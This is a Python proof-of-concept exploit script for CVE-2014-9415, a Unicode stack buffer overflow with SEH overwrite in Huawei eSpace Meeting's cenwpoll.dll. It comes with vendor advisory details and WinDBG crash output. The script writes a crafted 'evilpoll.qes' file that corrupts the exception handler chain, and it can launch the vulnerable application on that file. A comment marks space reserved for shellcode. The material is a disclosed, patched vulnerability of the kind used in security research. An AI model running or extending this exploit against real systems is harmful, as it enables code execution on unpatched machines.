#!/usr/bin/env python 
# -*- coding: utf-8 -*- # # Huawei eSpace Meeting cenwpoll.dll Unicode Stack Buffer Overflow with SEH Overwrite # # # Vendor: Huawei Technologies Co., Ltd. # Product web page: https://www.huawei.com # Affected application: eSpace 1.1.11.103 (aka eSpace ECS, eSpace Desktop, eSpace Meeting, eSpace UC) # Affected application: Mobile Office eConference V200R003C01 6.0.0.268.v67290 # Affected module: cenwpoll.dll 1.0.8.8 # Binaries affected: mcstub.exe, classreader.exe, offlinepolledit.exe, eSpace.exe # # Product description: 

# -------------------- # 1. Create more convenient Enhanced Communications (EC) services for your enterprise with this suite of # products. Huawei’s EC Suite (ECS) solution combines voice, data, video, and service streams, and provides # users with easy and secure access to their service platform from any device, in any place, at any time. # 2. The eSpace Meeting allows you to join meetings that support voice, data, and video functions using # the PC client, the tablet client, or an IP phone, or in a meeting room with an MT deployed. # # Vulnerability description: 

# -------------------------- # eSpace Meeting is prone to a stack-based buffer overflow vulnerability (seh overwrite) because it fails # to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer when # handling QES files. Attackers can exploit this issue to execute arbitrary code within the context of # the affected application. Failed exploit attempts will likely result in denial-of-service conditions. # # Tested on: # ---------- # OS Name: Microsoft Windows 7 Professional # OS Version: 6.1.7601 Service Pack 1 Build 7601 # RAM 4GB, System type: 32bit, Processor: Intel(R) Core(TM) i5-4300U CPU 1.90GHz 2.50GHz 

# # Vulnerability discovered by: # ---------------------------- # B3K451 CYB3R T34M # 

Senior STTE # SCD-ERC # Munich, Germany # 26th of August (Tuesday), 2014 # # PSIRT details: # -------------- # Security advisory No.: Huawei-SA-20141217- espace # Initial release date: Dec 17, 2014 # Vulnerability ID: HWPSIRT-2014-1151 # CVE ID: CVE-2014-9415 # Patched version: eSpace Meeting V100R001C03 # Advisory URL: https://www.huawei.com/en/psirt/security-advisories/hw-406589 #  # # ------------------------------------ WinDBG output ------------------------------------ # # m_dwCurrentPos = 0 ,dwData = 591 ,m_dwGrowSize = 4096(1db0.1828): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # eax=00000000 ebx=00410041 ecx=00000000 edx=00000578 esi=08de1ad8 edi=00410045 # eip=05790f3e esp=02fc906c ebp=02fecd00 iopl=0         nv up ei pl zr na pe nc # cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246 # *** WARNING: Unable to verify checksum for C:\Program Files\eSpace-ecs\conf\cwbin\cenwpoll.dll # *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\eSpace-ecs\conf\cwbin\cenwpoll.dll -  # cenwpoll!DllUnregisterServer+0xa59e: # 05790f3e 8178082c010000  cmp     dword ptr [eax+8],12Ch ds:0023:00000008=???????? # 0:008> !exchain # 02feccf4: *** WARNING: Unable to verify checksum for C:\Program Files\eSpace-ecs\conf\cwbin\mcstub.exe # *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\eSpace-ecs\conf\cwbin\mcstub.exe # mcstub+10041 (00410041) # Invalid exception stack at 00410041 # Instruction Address: 0x0000000005790f3e #  # Description: Exception Handler Chain Corrupted # Short Description: ExceptionHandlerCorrupted # Exploitability Classification: EXPLOITABLE # Recommended Bug Title: Exploitable - Exception Handler Chain Corrupted starting at cenwpoll!DllUnregisterServer+0x000000000000a59e (Hash=0xbc5aacab.0x6c23bb0b) # # Corruption of the exception handler chain is considered exploitable # # 0:008> d ebp # 02fecd00  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A. # 02fecd10  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A. # 02fecd20  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A. # 02fecd30  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A. # 02fecd40  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A. # 02fecd50  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A. # 02fecd60  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A. # 02fecd70  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A. # 0:008> u ebp # 02fecd00 41              inc     ecx # 02fecd01 004100          add     byte ptr [ecx],al # 02fecd04 41              inc     ecx # 02fecd05 004100          add     byte ptr [ecx],al # 02fecd08 41              inc     ecx # 02fecd09 004100          add     byte ptr [ecx],al # 02fecd0c 41              inc     ecx # 02fecd0d 004100          add     byte ptr [ecx],al # # ------------------------------------ /WinDBG output ------------------------------------ # # import sys, os, time os.system('title jterm') os.system('color f5') os.system('cls') piton = os.path.basename(sys.argv[0]) def usage(): print ''' +---------------------------------------------+ |  eSpace Meeting Stack Buffer Overflow Vuln  | |                                             | |         Vuln ID: HWPSIRT-2014-1151          | |            CVE ID: CVE-2014-9415            | +---------------------------------------------+ ''' if len(sys.argv) < 2: print 'Usage: \n\n\t'+piton+' <OPTION>' print '\nOPTION:\n' print '\t0 - Create the evil PoC file.' print '\t1 - Create the evil file, start the vulnerable application and crash it.' print '\t2 - Create the evil file, start the vulnerable application under Windows Debugger with SEH chain info.\n' quit() usage() crash = sys.argv[1] dir = os.getcwd(); file = "evilpoll.qes" header = '\x56\x34\x78\x12\x01\x00\x09\x00' # V4x..... time.sleep(1) # Overwrite FS:[0] chain (\x43 = EIP) buffer = '\x41' * 353 +'\x42' * 2 +'\x43' * 2 +'\x44' * 42 +'New Poll' # \x44 can be incremented (byte space for venetian shellcode) buffer += '\x00\x01\x00\x00\x00\x00\x00\x90' buffer += '\x85\xA9\xD7\x00\x01\x04\x00' buffer += 'TEST'+'\x01\x02\x05\x00' buffer += 'ANSW1'+'\x05\x00' buffer += 'ANSW2' poc = header + buffer bytes = len(poc) print '[+] Creating evil PoC file...' time.sleep(1) print '[+] Buffering:\n' time.sleep(1) index = 0 while index < len(poc): char = poc[index] #print char, sys.stdout.write(char) time.sleep(10.0 / 1000.0) index = index + 1 try: writeFile = open (file, 'w') writeFile.write( poc ) writeFile.close() time.sleep(1) print '\n\n[+] File \"'+file+'\" successfully created!' time.sleep(1) print '[+] Location: "'+dir+'"' print '[+] Wrote '+str(bytes)+' bytes.' except: print '[-] Error while creating file!\n' if crash == '0': print '\n\n[+] Done!\n' elif crash == '1': print '[+] The script will now execute the vulnerable application with the PoC file as its argument.\n' os.system('pause') os.system('C:\\Progra~1\\eSpace-ecs\\conf\\cwbin\\classreader.exe "%~dp0evilpoll.qes"') elif crash == '2': print '[+] The script will now execute the vulnerable application with the PoC file as its argument under Windows Debugger.\n' os.system('pause') os.system('C:\\Progra~1\\Debugg~1\\windbg.exe -Q -g -c "!exchain" -o "C:\\Progra~1\eSpace-ecs\conf\cwbin\classreader.exe" "%~dp0evilpoll.qes"') print '\n[+] You should see something like this in WinDBG:' print ''' 0:000> d 0012e37c 0012e37c  42 00 42 00 43 00 43 00-44 00 44 00 44 00 44 00  B.B.C.C.D.D.D.D. 0012e38c  44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00  D.D.D.D.D.D.D.D. 0012e39c  44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00  D.D.D.D.D.D.D.D. 0012e3ac  44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00  D.D.D.D.D.D.D.D. 0012e3bc  44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00  D.D.D.D.D.D.D.D. 0012e3cc  44 00 44 00 44 00 44 00-44 00 44 00 4e 00 65 00  D.D.D.D.D.D.N.e. 0012e3dc  77 00 20 00 50 00 6f 00-6c 00 6c 00 00 00 00 00  w. .P.o.l.l..... 0012e3ec  c2 01 00 00 56 34 78 12-70 09 87 02 00 00 00 00  ....V4x.p....... 0:000> !exchain 0012e37c: 00430043 Invalid exception stack at 00420042 ''' else: print '[+] Have a nice day! ^^\n' quit() print '\n[+] Have a nice day! ^^\n' #os.system('color 07')


#B3K451 CYB3R T34M